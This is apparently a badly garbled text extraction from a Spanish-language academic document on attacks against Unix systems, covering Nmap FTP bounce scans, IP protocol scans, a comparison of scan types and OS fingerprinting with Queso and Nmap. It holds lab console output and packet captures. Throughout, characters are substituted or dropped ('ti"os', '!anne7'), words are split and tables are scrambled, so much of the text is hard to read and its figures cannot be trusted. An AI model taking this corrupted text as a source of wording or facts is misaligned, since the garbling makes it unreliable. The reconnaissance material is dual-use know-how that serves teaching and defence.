marcelo@saturno:~/src/nmap/bin$ u7o .;nmap -b mar!e"o:mar!epa I19(.16).0.30 19(.16).0.100 -p ((4)0 ?int: if Eour boun!e !an target 'o t arenJt rea!'ab"e from 'ere4 remember to u e -PN o >e 7onJt trE an7 ping t'em prior to t'e !an .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 1):37 #$.T 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< ((;t!p !"o e7 ' )0;t!p open 'ttp 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 1+.507 e!on7

Consola +% FF! Bounce ,can a *02.*JO...*.. usando el FF! ,erver en *02.*JO...-.
220 !i!"on BTP er@er 9=er ion 6.002.: rea7E. K.<$ mar!e"o 1 Pa >or7 require7 for mar!e"o. P#.. mar!epa 2 0 K er mar!e"o "ogge7 in. PO$T 19(416)404100404(( 200 PO$T !omman7 u!!e fu". 28.T .21 ,anJt bui"7 7ata !onne!tion: ,onne!tion refu e7. PO$T 19(416)404100404)0 200 PO$T !omman7 u!!e fu". 28.T 110 Opening #.,88 mo7e 7ata !onne!tion for J;bin;" J. 226 Tran fer !omp"ete. 221 /ou !ou"7 at "ea t aE goo7bEe.

Ca"tura *2% Ca"tura de la sesi8n FF! entre A ' B

En la Consola + se

uestran los "ará etros básicos que @ a" ace"ta "ara

el FF! Bounce scan# ' su salida ;cuando las "recondiciones descri"tas estás dadas>. En la Ca"tura *2 se "uede ver la sesi8n FF! co "leta# tanto los co andos que ejecuta el !ort ,canner en A co o las res"uestas del servidor FF! en B.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. J. de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"
Paquete Nro: (1 - Tiempo: 9.116513 8P Origen: 192.168.0.2:3+691 !%" &' 8P De tino: 192.168.0. 0:21 !(" Proto!o"o: +2* De !rip!i%n: /e3uest: *4/2 192516850510050522 Paquete Nro: (( - Tiempo: 9.116990 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 200 *4/2 command success6ul. ... Paquete Nro: (+ - Tiempo: 9.1(0+70 8P Origen: 192.168.0.2:3+691 !%" &' 8P De tino: 192.168.0. 0:21 !(" Proto!o"o: +2* De !rip!i%n: $eque t: 7I-2 Paquete Nro: (5 - Tiempo: 9.1((+91 8P Origen: 192.168.0. 0:20 !(" &' 8P De tino: 192.168.0.100:22 !$" Proto!o"o: 2$* De !rip!i%n: (0 > (( --890 .eq10 2en10 3..11+60 &.13 T.=13031(093 T.<$10 ... Paquete Nro: (7 - Tiempo: 9.1(671+ 8P Origen: 192.168.0.100:22 9$" &' 8P De tino: 192.168.0. 0:20 !(" Proto!o"o: T,P De !rip!i%n: (( > (0 -/-25 %$:0 .eq10 #!611 &in10 2en10 ... Paquete Nro: (9 - Tiempo: 9.16601( 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: .21 $an;t build data connection: $onnection re6used. Paquete Nro: 30 - Tiempo: 9.166(95 8P Origen: 192.168.0.2:3+691 !%" &' 8P De tino: 192.168.0. 0:21 !(" Proto!o"o: +2* De !rip!i%n: /e3uest: *4/2 192516850510050580 Paquete Nro: 31 - Tiempo: 9.1666(1 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 200 *4/2 command success6ul. Paquete Nro: 3( - Tiempo: 9.166765 8P Origen: 192.168.0.2:3+691 !%" &' 8P De tino: 192.168.0. 0:21 !(" Proto!o"o: +2* De !rip!i%n: /e3uest: 7I-2 Paquete Nro: 33 - Tiempo: 9.16)))1 8P Origen: 192.168.0. 0:20 !(" &' 8P De tino: 192.168.0.100:80 !$" Proto!o"o: 2$* De !rip!i%n: (0 > )0 --890 .eq10 2en10 3..11+60 &.13 T.=13031(117 T.<$10 ... Paquete Nro: 35 - Tiempo: 9.17(133 8P Origen: 192.168.0.100:80 !$" &' 8P De tino: 192.168.0. 0:20 !(" Proto!o"o: 2$* De !rip!i%n: )0 > (0 --895 %$:0 .eq10 #!611 &in130660 2en10 3..11+60 T.=1+61953( T.<$13031(117 &.10 ... Paquete Nro: 37 - Tiempo: 9.17+05) 8P Origen: 192.168.0. 0:20 !(" &' 8P De tino: 192.168.0.100:80 !$" Proto!o"o: 2$*

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. J* de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"
De !rip!i%n: (0 > )0 -%$:0 .eq11 #!611 &in16660) 2en10 T.=13031(13+ T.<$1+61953( ... Paquete Nro: 39 - Tiempo: 9.17+09+ 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 110 4pening %-$II mode data connection 6or ;/bin/ls;. Paquete Nro: +0 - Tiempo: 9.175116 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 226 2rans6er complete.

Ca"tura *-% Ca"tura de trá/ico del

o ento donde el FF! ,erver B c$equea ;en no bre de A>

el estado de los "uertos 22 (cerrado( "ri ero ' O. luego (abierto( en C.

En la Ca"tura *- "uede verse una ca"tura a

ás bajo nivel de c8 o se

co "orta B cuando recibe el co ando FF! :7,F% intenta establecer la cone9i8n# ' en base a eso in/or a a A del resultado. El resto de la ca"tura ;detalles de c8 o se cierran las cone9iones# ' de ás> se "uede encontrar en el Ane9o B. Este ti"o de escaneo tiene en com'n con el Idle Acan )ran parte de las ventajas ! desventajas. @ueva ente# la ventaja de este ti"o de escaneo 'ace en la i "osibilidad de que C deter ine que el escaneo "roven)a de B# as) co o ta bién la no necesidad de que el "ort scanner A se ejecute con "rivilegios de ad inistrador. :a enor e desventaja de este ti"o de escaneo reside en la )ran di=icultad de encontrar un 2T4 Aerver con este CagujeroD de seguridad ; uc$o ás di/)cil que encontrar un CQo bieD "ara la técnica anterior>. Casi todos los servidores FF! conocidos $acen ;"or de/ecto ' aGn si "er iten ejecutar el co ando> un c$equeo de la direcci8n 7! del "ará etro !?<F ;veri/ican si la 7! es igual a la del cliente># i "idiendo esta co unicaci8n C,erver to ,erverD. As) ' todo# en la a'or)a es "osible C/orzarD este co "orta iento ;"er itido en el <FC>. !or eje "lo# "ara el servidor FF! de FreeB,5O0 $a' que agregar el "ará etro C(<D a la l)nea C/t"dU/lagsD del arc$ivo &etc&de/aults&rc.con/. En otro servidor co o vs/t"d0.# dic$o "er iso sobre el co ando !?<F $a' que $abilitarlo con la l)nea de con/iguraci8n C"ortU"ro iscuousaKE,DH as) ' todo# al utilizar vs/t"d co o 5ounce Server# el ataque /alla. Ls/t"d "arece nunca retornar
O0 FreeB,5 incor"ora un servidor FF! en su so/tIare de base. Ler% $tt"%&&III./reebsd.org&doc&enU2,.7,?OO50(*&boo6s&$andboo6&netIor6(/t".$t l 0. Ls/t"d ;Ver1 Secure F-P (aemon> es uno de los servidores FF! inclu'e "or de/ecto en la ás di/undidos 'a que se a'or)a de las distribuciones :inu9. Ler% $tt"%&&vs/t"d.beasts.org&

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. J2 de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

un c8digo di/erente de 2.. ;?R> a "esar de que su cone9i8n al objetivo /ue rec$azada con un <,F.
220 !<s+2*d 2.0.." K.<$ anonEmou 1 P"ea e pe!ifE t'e pa >or7. P#.. ->>>u erI 2 0 2ogin u!!e fu". PO$T 19(416)404100404)0 200 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. 28.T 110 ?ere !ome t'e 7ire!torE "i ting. 226 Dire!torE en7 O5. PO$T 19(416)4041004+43( 200 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. 28.T 110 ?ere !ome t'e 7ire!torE "i ting. 226 Dire!torE en7 O5. 100 OOP.:

Ca"tura *1% ,esi8n de ataque de un servidor L,FF!5 con/igurado "ara ser vulnerable

:uego vs/t"d# al no in/or ar del /allo en su cone9i8n al "uerto *.5J ;cerrado> de la 7! *02.*JO...*..# @ a" CcreeD que dic$o "uerto está abierto# cuando en realidad está cerrado%
marcelo@saturno:~/src/nmap/bin$ ./nmap &b 192.168.0.60 192.168.0.100 &p 8051016 ?int: if Eour boun!e !an target 'o t arenJt rea!'ab"e from 'ere4 remember to u e -PN o >e 7onJt trE an7 ping t'em prior to t'e !an .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 (0:19 #$.T 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< )0;t!p open 'ttp 1056;t!p open un6no>n Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 1+.169 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - . 19(.16).0.100 -p )041056 .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 (0:(( #$.T 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< )0;t!p open 'ttp 1016/tcp closed un=no>n 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.+(6 e!on7

Consola O% FF! Bounce ,can a un servidor L,FF!5 ' un ,'n ,can co o "rueba del error

Co o "uede a"reciarse# aGn cuando se con/igure Ca "ro"8sitoD un servidor FF! "ara que "er ita este ti"o de cone9iones C,ervidor a ,ervidorD ;FA!># "or res"eto al estándar o "or alguna necesidad en concreto# es e9tre ada ente di/)cil
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. J- de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

$o' en d)a que un escaneo de "uertos con este

étodo sea e/ectivo ' con/iable.

1.-.0. Escaneo de !rotocolos 7!
,i bien FC!# 25! e 7CM! son los "rotocolos que usual ente son enca"sulados "or 7!# 7! "uede dar servicio a varios "rotocolos de ca"a 1 0*. @ a" "er ite averiguar si el destino so"orta otro "rotocolo de ca"a 1# enviando "aquetes de "rueba e iterando valores en el ca "o protocol del encabezado 7!. El "a'load de los "aquetes que env)a es vac)o# 'a que en caso de que el objetivo no so"orte el "rotocolo de 7!."rotocol# deber)a res"onder con un "aquete 7CM! F'"e - Code 2 ;CProtocol Unreac ableD># que 'a es arcarlo co o CclosedDH en este caso# el co "orta iento es otivo su/iciente "ara u' si ilar al de un

25! ,can ;en que si se tiene res"uesta es "orque el "rotocolo no está dis"onible>. En caso de que no se obtenga res"uesta# o si se obtiene algo di/erente al "aquete 7CM! de C!rotocolo @o 5is"onibleD# se di/erente al c8digo 2 ;c8digos *# -# 0# *. o *-># se =iltrado ;aunque sea real ente un caso e9traBo>. :as tres e9ce"ciones son los "rotocolos 7CM!# FC! ' 25!# que co o @ a" 'a sabe c8 o anejarlas# les env)a un "a'load en su Cest) uloD "ara au entar la con/ianza de los resultados.
marcelo@saturno:~/src/nmap/bin$ -p 1-+1 -r u7o .;nmap - O 19(.16).0.60 --rea on

arca el "rotocolo co o arca al "rotocolo co o

a(ierto. !or Glti o# si se recibe otro ti"o de error 7CM! Fi"o - C2nreac$ableD

.tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 ((:53 #$.T 8ntere ting proto!o" on trueno 919(.16).0.60:: Not 'o>n: 36 !"o e7 proto!o" $ea on: 36 proto-unrea!'e P$OTO,O2 .T#T< .<$=8,< $<#.ON 1 open i!mp port-unrea!' ( openFfi"tere7 igmp no-re pon e 6 open t!p proto-re pon e 17 open u7p port-unrea!' +1 openFfi"tere7 ip@6 no-re pon e 3#, #77re : 00:0,:(9:#6:)0:D) 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in (6.170 e!on7

Consola 0% Eje "lo de un escaneo de !rotocolos 7!

En la consola 0 "uede verse que de los "ri eros 1* "rotocolos escaneados#
0* !ara ver un listado de "rotocolos ' su c8digo res"ectivo # ver el arc$ivo &etc&"rotocols de cualquier ,? ti"o 2ni9# o ver% $tt"%&&III.iana.org&assign ents&"rotocol(nu bers Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. J1 de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

la

a'or)a están cerrados ' algunos "ocos abiertos. Es interesante co "robar que

7!vJ está activado en este $ost. :a ca"tura eje "lo de este escaneo ;nG ero *1B> se la "uede encontrar junto a las de ás de este ca")tulo en el Ane9o B.

1.-.*.. Fi"os de escaneo% <esu en
2na vez re"asados los ti"os de scanning dis"onibles de @ a"# "uede resu irse en la siguiente tabla co "arativa# de acuerdo a los objetivos deseables de un "ort scanner ' caracter)sticas relevantes%

@ecesidad de "oseer "er isos de usuario root o ad inistrador del ,iste a ?"erativo ;C!riv.<aID>. Lelocidad <elativa con res"ecto al resto ;CLeloc.D>02. Cuán CsigilosaD o Cstealt$D es la técnica. :a "recisi8n de los resultados. !ara qué se usa# con qué objetivo co Gn se utiliza. 4riv.Ra@ Beloc. Atealt9 4recisi-n
,i @o ,i ,i ,i ,i ,i @o ,i Media Baja Media Media Alta Media Mu' Baja Mu' Baja Baja Medio Mu' Bajo Alto Alto Medio& Bajo Alto Mu' Alto Alta Alta Media Baja Media Media Alta

● ● ● ●

Fi"o&Caract. ,'n ,can Connect ,can Ac6 ,can 4indoI ,can 25! ,can M&@ull&Fin&A as 7dle ,can FF! Bounce 7! ,can

0(jetivo
!uertos Abiertos # Cerrados ' Filtrados !uertos Abiertos # Cerrados ' Filtrados !uertos Filtrados !uertos Filtrados _ Abiertos&Cerrados !uertos 25! Cerrados o Abiertos&Filtrados !uertos FC! Cerrados !uertos Abiertos# Cerrados ' Filtrados !uertos Abiertos# Cerrados&Filtrados 5etectar "rotocolos activos de Ca"a 1

Mu' Alto Media&Baja Bajo Media

02 As) ' todo# cabe recordar que la ra"idez de/initiva de un escaneo se debe a innu erables /actores co o trá/ico# dela'# anc$o de banda# resultados de la eta"a de $ost discover'# etc. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. J5 de 2*.

Ca")tulo 5. ( Ca")tulo 5. ?tras Fécnicas de <econoci iento Activo

/ap6tulo . 0tras Técnicas de Reconocimiento Activo
?tra tarea co Gn ente realizada en el in/or aci8n del objetivo# ' deter inar con la objetivo. Fanto el ,iste a ?"erativo en ejecuci8n co o qué ,o/tIare ' en qué "uerto# o ta bién qué versi8n en "articular del is o son u' i "ortantes "ara dirigir el "osible ataque ' descartar /uturos ca inos sin salida. o ento de obtener ás u' /recuentada luego del escaneo de "uertos# es

a'or "recisi8n "osible qué so/tIare está corriendo en el

5.*. 5etecci8n del ,iste a ?"erativo% ?, Finger"rinting
El ,iste a ?"erativo# co o tal# brinda a las a"licaciones la trabajo de bajo nivel i "le entando los "rotocolos de red "or eje "lo Et$ernet# 7!# FC! ' 25! entre uc$os otros. a'or "arte del ás co unes# co o

El FC!&7! Fingerprinting ;C$uella dactilarD de FC!&7!# ta bién lla ado C?, Finger"rintingD "or C?perating S1stem Finger"rintingD> trata de establecer qué ,iste a ?"erativo gener8 un "aquete o cierto trá/ico de red# de acuerdo a "articularidades conocidas de las di/erentes i "le entaciones de FC!&7!. :uego de este "aso# el intruso "uede buscar ataques conocidos# con/iguraciones débiles "or de/ecto# /allos de diseBo# etc. "ara al ar ar un listado de intentos de intrusi8n a este nivel. Esto sucede "orque si bien los <FC son bastante detallados ' cubren la a'or)a de los casos que suceden en la "ráctica# aun as) dejan algunas situaciones sin es"eci/icar ;"or su i "robabilidad de ocurrencia o su insigni/icancia># que di/erentes ,iste as ?"erativos i "le entan en su "ro"ia versi8n de FC!&7! a su anera. enos intentar

5.*.*. 5etecci8n Activa
:a detecci8n activa es la ás antig^a de estas técnicas# que data de *00+&*00O# cuando la $erra ienta Vue,?0- se co enz8 a "o"ularizar "or 7nternet# dada su ca"acidad de detecci8n ;relativa ente /iable> de un ,iste a ?"erativo re oto. ,i bien la "ri era versi8n de Vue,? co enz8 "or di/erenciar entre $osts
0- Vue,? actual ente no tiene sitio 4eb# 'a que el "ro'ecto está discontinuadoH sin e bargo# su c8digo /uente se "uede conseguir en $tt"%&&/t".cerias."urdue.edu&"ub&tools&uni9&scanners&queso& Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. JJ de 2*.

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

ejecutando 4indoIs o :inu9# su naturaleza P!: $izo que se distribu'era C/ir asD "ara que cada vez @ a" agreg8 las

u'

rá"ida ente e in ediata ente a"arecieron colaboradores a"ortando nuevas ás ,?s /ueran detectados. Mu' "oco tie "o des"ués étodo de /unciona iento o is as ca"acidades ;en ?ctubre de *00O># ' varias $erra ientas is o tie "o "ara au entar la e/ectividad01.

ás se crearon "osterior ente utilizando este co binando varios al

:a idea básica es si ilar a la de un "ort scanner% el atacante ejecuta un so=t@are que env6a >prue(as? o paquetes >sin sentido? a un 9ost o(jetivo cu!as respuestas ;o /alta de ellas> son interpretadas como evidencia% en (usca de un patr-n de comportamiento que coincida con uno conocido de antemano% perteneciente a un Aistema 0perativo en particular . Estos "atrones ; ás conocidos co o C/ir asD> "or lo general se al acenan en un arc$ivo de con/iguraci8n# al cual se "er ite acceder# odi/icar ' co "artir con el "ro'ecto original o con terceros "ara a "liar las ca"acidades de detecci8n# dado que es legible o está docu entado ' es inteligible05 ;ver Consolas *. ' **>.
marcelo@saturno:~/src/3ueso&980922$ !at que o.!onf L----------------------------------------------------------L que o.!onf bE a@ageIapo to" .org L----------------------------------------------------------L ,=.: M87: que o.!onf4@ 1.30 199);09;16 0):(6:0+ anonEmou <Dp M L----------------------------------------------------------L Pa6et Bormat: L L n a > f L n -> 0..5 -> pa6et N 9in re pon e to .4.#4B4B#4.B4P: L -> 0 1 -> !ontainO eq 911Ee 401no4-1no rep"E: L a -> 0 1 - PD $ -> !ontainO a!6 L > -> 0 1 D -> >in7o> 9 01no4 11 i4 D1'eDA@a"ue : L f -> .$#BPG/K -> ./N $.T #,5 B8N P.? GGG /// K$H<NT-ptr L L----------------------------------------------------------?...@ Q ,8.,O-8O. 11.0 0 1 1 1 .# 1 - - - ( 0 1 0 $# 3 0 0 0 $ + - - - 5 0 1 0 $# ?...@

Consola *.% Arc$ivo de /ir as de Vue,?

01 =erra ientas Activas de ?, Finger"rinting% $tt"%&&III.netIor6intrusion.co.u6&os/a.$t 05 @ a" tiene un /or ato de /ir as de ,iste as ?"erativos un tanto "articular# que está docu entado en este enlace% $tt"%&&n a".org&osdetect&osdetect(/inger"rint(/or at.$t l Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. J+ de 2*.

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting
A 4pen(-) ..2 BC9C/I$A 01 i 86 Bingerprint OpenC.D +.( ,"a OpenC.D F OpenC.D F +.G F genera" purpo e .<R9.P110(-10,SH,D1T7S8.$1103-10DST81$DS881$8ST.1(1: OP.9O1135C+NN.N&0NNT11SO(135C+NN.N&0NNT11SO3135C+N&0NNT11SO+135C+NN.N&0 NNT11SO5135C+NN.N&0NNT11SO6135C+NN.NNT11: &8N9&11+000S&(1+000S&31+000S&+1+000S&51+000S&61+000: <,N9$1/SDB1/ST1+0STH1+0S&1+000SO135C+NN.N&0S,,1NSR1: T19$1/SDB1/ST1+0STH1+0S.1OS#1.PSB1#.S$D10SR1: T(9$1N: T39$1N: T+9$1N: T59$1/SDB1/ST1+0STH1+0S&10S.1US#1.PSB1#$SO1S$D10SR1: T69$1N: T79$1N: K19DB1NST1BBSTH1BBSTO.10S8P213)SKN10S$8P21HS$8D1HS$8P,51HS$K,51HS$K21H S$KD1H: 8<9DB81.ST1BBSTH1BBSTO.81.S,D1.S.81.SD281.:

Consola **% Fir a de ?"enB,5 1.2 al acenada en el /or ato de @Ma" 2da generaci8n

@ a" en "articular ree "laz8 la "ri era edici8n del ,?0J a "artir de la versi8n 1.5.0+# "or un nuevo

otor de detecci8n de

otor conocido co o de su

Csegunda generaci8nD. Este gran ca bio estuvo siendo "re"arado durante alrededor de 2 aBos# 'a que el arc$ivo de /ir as que incor"oraba /ue reconstru)do desde cero. =o' @ a" "osee en la Glti a versi8n a este :a segunda generaci8n del
S@MA!U?,2T>

o ento ;1.J.> *-.1

/ir as corres"ondientes a 1+O ,?s o versiones di/erentes de ,?s0O. otor de /inger"rinting de @ a" ;Ler categoriza su evaluaci8n co "leta en 5 tests generales en donde

cada uno env)a una serie "rede/inida de "aquetes. :a res"uesta que se obtiene de cada test "er ite $acer varias ' di/erentes evaluaciones '&u obtenci8n de "ará etrosH estas evaluaciones o "ará etros se agru"an "or lo que se lla an probes dentro de un Fest. Fodos estos probes co "uestos "or sus "ará etros calculados con/or an la C$uella dactilarD de un ,? ' son los que e/ectiva ente se vuelcan en un arc$ivo de /inger"rint. @ a"# co o la a'or)a de este ti"o de $erra ientas# /o entan la is o sea re"ortado al "artici"aci8n de los usuarios i "ri iendo "or "antalla un /inger"rint que no e9ista en la base de /ir as# con la intenci8n de que el "ro'ecto junto con la identi/icaci8n de a qué ,? "ertenece.
0J !ara ás in/or aci8n sobre la "ri era generaci8n del otor# que aGn sigue siendo Gtil# ver

S@MA!U?,*T ' S=ACRUEA!T# Ca". 2. 0+ Ler $tt"%&&insecure.org&st/&@ a"(1.5.(<elease.$t l 0O !ara a'or in/or aci8n de los ca bios entre las di/erentes versiones de @ a"# ver el siguiente enlace% $tt"%&&n a".org&c$angelog.$t l Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. JO de 2*.

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

=e aqu) una breve enu eraci8n de los tests de ?, /inger"rinting de 2da. generaci8n realizados "or @ a" ' de la a'or)a de las evaluaciones que corre sobre las res"uestas obtenidas00 "ara obtener los "ará etros del ,?% 7. Test de Meneraci-n de N'meros de Aecuencias ;probes ,EV# ?!,# 47@ ' F*>. Básica ente son J ,K@s ;con di/erentes co binaciones de flags> a un "uerto abierto. !ará etros ?btenidos% aE ?btenci8n de Má9i o Co Gn 5eno inador en los @G eros de ,ecuencia FC! 7niciales ;o 7,@s>*.. ;M/D>. (E Cálculo de la Media del au ento de los @G eros de ,ecuencia FC! 7nicial obtenidos ;IAR>. cE 7ndice de "redictibilidad de la secuencia de 7,@s obtenida ;A4>. Es la varianza de lo anterior. Esti a la di/icultad de "redecir el siguiente 7,@ de una secuencia conocida de J 7,@s. dE Evaluaci8n del algorit o de generaci8n de ,ecuencias 7!(75 "ara "aquetes FC! e 7CM! ;TI% II>. eE Booleano de ,ecuencia 7! 75 Co "artida ;AA>. ,i el destino co "arte la secuencia 7!(75 entre los "rotocolos FC! e 7CM!# este ca "o se establece en C,D# que "roviene de CS aredD# o CCo "artidaD. =E ?"ciones de FC! ;0 o 07.0#>. @ a" env)a en los "robes de este test algunas o"ciones de FC! ' aqu) se al acenan las res"uestas obtenidas. )E Fa aBo de Lentana FC! 7nicial ;H o H7.H#>. ,8lo se al acena el ta aBo de ventana del "aquete recibido "or cada probe. 9E <es"uesta ;R>% ,i el $ost res"ondi8H s8lo se al acena un CKD o C@D. iE Bits 7! de @o Frag entaci8n en "aquetes FC! e 7CM! ;D2% D2I>. ,e al acena si los "aquetes recibidos conten)an el bit en cuesti8n activado o no. jE Lalor FF: 7nicial del ca "o 7! ;T> ' su valor original esti ado ;TM>. ,e al acena el FF: de las res"uestas recibidas ;todas son CinicialesD#
00 Entre "aréntesis al /inal de cada )te se encuentran los c8digos que el autor de @ a" le asign8 dentro del docu ento al que se $ace re/erencia ;S@MA!U?,2T>. *.. El @G ero de ,ecuencia FC! 7nicial o 7,@ es el valor del ca "o FC!(@G ero de ,ecuencia del "ri er "aquete ,K@_ACR que devuelve el $ost destino a un ,K@ enviado "or @ a" a un "uerto abierto. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. J0 de 2*.

Evaluaciones realizadas con sus resultados '&o

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

'a que este tér ino se re/iere a la res"uesta de un ,K@> ' se trata de establecer cuál es el FF: realH "or lo general es la "otencia de 2 ás cercana. :E @G ero de ,ecuencia FC! ;A>. 5i/erencia entre @G ero de ,ecuencia de la res"uesta ' el @G ero de ACR del ,K@ que envio @ a". !uede establecerse en cero ;Q># iguales ;A># el ACR es cualquier otro caso ;?>. lE @G ero de ACR FC! ;A>. ,i ilar al anterior "ero lo que se co "ara es la di/erencia entre el ACR de la res"uesta ' el @G ero de ,ecuencia en el ,K@ enviado "or @ a". !uede ser cero ;Q># iguales ;,># el ACR es a'or en uno ;,_># o cualquier otro caso ;?>. mE Banderas ;Flags> FC! ;2>. Este ca "o guarda las banderas FC! de la res"uesta. +. Test de Fco I/14 ;probe 7E>. Env)a 2 "aquetes 7CM! ti"o .9.O ;ec$o> con sutiles di/erencias en el encabezado 7!. Evaluaciones realizadas con sus resultados '&o !ará etros ?btenidos% aE <# 5F7# F# FP ;descri"tas anterior ente>. (E Fi"o de ,ervicio 7! ;Fo,> "ara <es"uestas 7CM! ;T0AI>. Al acena la co "araci8n de las res"uestas a los probes enviados en este Fest. cE C8digo de <es"uesta 7CM! ;/D>. Al acena la relaci8n del c8digo de res"uesta del ec$o(re"l' 7CM!. ,e su"one que es cero "ero a veces var)a. dE :ongitud de los datos "ara las res"uestas 7CM! ; DLI>. Cuando se inclu'en datos en los ec$o(request 7CM! se su"one que en el re"l' retornan igual. Este "ará etro al acena el ta aBo del re"l' ;de esta anera se sabe si es igual o no al es"erado>. ;. Test de Noti=icaci-n Fxpl6cita de /on)esti-n T/4 ;probe EC@>. Consiste en enviar un "aquete FC! con banderas de congesti8n de trá/ico FC! activadas. Evaluaciones realizadas con sus resultados '&o !ará etros ?btenidos% aE <# 5F# F# FP# 4# ? ;descri"tas anterior ente>. (E @oti/icaci8n de congesti8n e9"l)cita ;//>. Fodo este Fest de"ende de esta evaluaci8n# que tiene que ver con el anejo de los ensajes de congesti8n FC! del destino ;' de sus /lags C4< ' ECE>.
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. +. de 2*.

a'or

a'or en uno ;A_># o

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

<. T/4 ;Probes F2 al F+>. ,e env)an J "aquetes FC! con sus resultados '&o !ará etros ?btenidos% aE <# 5F# F# FP# 4# ,# A# F# ? ;descri"tas anterior ente>.

ás# con varias

co binaciones en el ca "o de o"ciones FC!. Evaluaciones realizadas

. UD4 ;Probe 2*>. Esta "rueba env)a * "aquete a un "uerto 25! cerrado# con el objetivo de recibir un 7CM! !ort 2nreac$able ' analizarlo. Evaluaciones realizadas con sus resultados '&o !ará etros ?btenidos% aE <# 5F# F# FP# F?, ;descri"tas anterior ente>. (E Fi"o de ,ervicio 7! ;T0AE corres"ondiente al "aquete recibido. cE :ongitud Fotal en encabezado 7! ;I4L>. ,8lo se lo al acenaH var)a segGn la i "le entaci8n 'a que la es"eci/icaci8n da a elegir cuántos b'tes del "aquete inicial debe devolver co o "a'load del 7CM!. dE !rueba de la longitud total en el encabezado 7! ;RI4L>. C$equea que el ca "o lengt$ del encabezado 7! contenga el valor corres"ondienteH algunas i "le entaciones generan eE Lalor del 7! 75 retornado ;RID>. =E Lalor correcto del c$ec6su ;RUL% RU/J>. 9E 7ntegridad de los datos 25! devueltos ;RUD>. Co o @ a" sabe lo que envi8 ' lo que debe recibir ;'a que está establecido "or el <FC># c$equea el "a'load 25! del !ort 2nreac$able. !ara ver un caso "ráctico de la inter"retaci8n de una /ir a ' el cálculo de los estos "ará etros# ver el Ane9o C en la "ág. *O5. del encabezado 7! ;RI4/J>. del encabezado 25! )E 7ntegridad de los ca "os longitud ' c$ec6su al este valor.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. +* de 2*.

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting
marcelo@saturno:~/src/nmap/bin$ u7o .;nmap -O 19(.16).0.30

.tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-31 17:13 #$T 8ntere ting port on !i!"on 919(.16).0.30:: Not 'o>n: 1711 !"o e7 port PO$T .T#T< .<$=8,< (1;t!p open ftp ((;t!p open ' 53;t!p open 7omain 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: )e<ice tDpe: general purpose /unning: +ree(-) 0.E 4- details: +ree(-) 0.0&(C2%. & 0.0&-2%(7C Fptime: 0.000 daDs !since Gon Gar 1 10:1 :20 2008" Net>or6 Di tan!e: 1 'op O. 7ete!tion performe7. P"ea e report anE in!orre!t re u"t at 'ttp:;;in e!ure.org;nmap; ubmit; . Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 16.73+ e!on7 marcelo@saturno:~/src/nmap/bin$

Consola *2% 5etecci8n de ,iste a ?"erativo con @Ma" N Coincidencia de /ir a "er/ecta

